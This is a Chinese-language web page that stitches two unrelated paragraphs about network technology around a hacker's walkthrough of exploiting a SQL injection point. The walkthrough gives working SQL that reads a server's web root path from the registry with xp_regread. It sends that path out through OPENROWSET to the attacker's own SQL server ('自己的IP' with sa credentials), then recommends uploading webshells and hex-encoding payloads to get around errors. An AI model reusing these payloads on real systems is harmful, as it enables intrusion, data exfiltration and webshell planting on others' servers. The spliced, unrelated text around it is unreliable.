網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 得到SQL注入點,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發現屏蔽了SQL錯誤信息,得不到物理路徑,那還寫個PP馬了.聯想到一個權限不是很高的命令openrowset,進行跨庫服務器查詢,就是把一個SQL命令發送到遠程數據庫,然后看返回的結果,但是要啟動事件跟蹤!我們可以把網站信息寫入數據庫,然后%$^%$@#$@^%$~ 首先在自己機器建立SQL數據庫 然后在對方機器上建立個表 create table [dbo].[fenggou]([cha8][char](255))-- 在對方執行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');-- 這樣fenggou這個表里就會有這樣一條記錄SELECT a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a 不用說,''D:\WEB"就是從注冊表里讀出的物理路徑拉.然后執行DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM fenggou) exec (@a1);-- 等于執行了SELECT a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a OK,這時你在你機器上SQL事件追蹤器上就會顯示SELECT * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~ PS:如果出錯的話轉換為16進制試試哈.以上是在偶滲透失敗,無奈的時候想的辦法,也許高人早就知道了吧,笑過~ 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!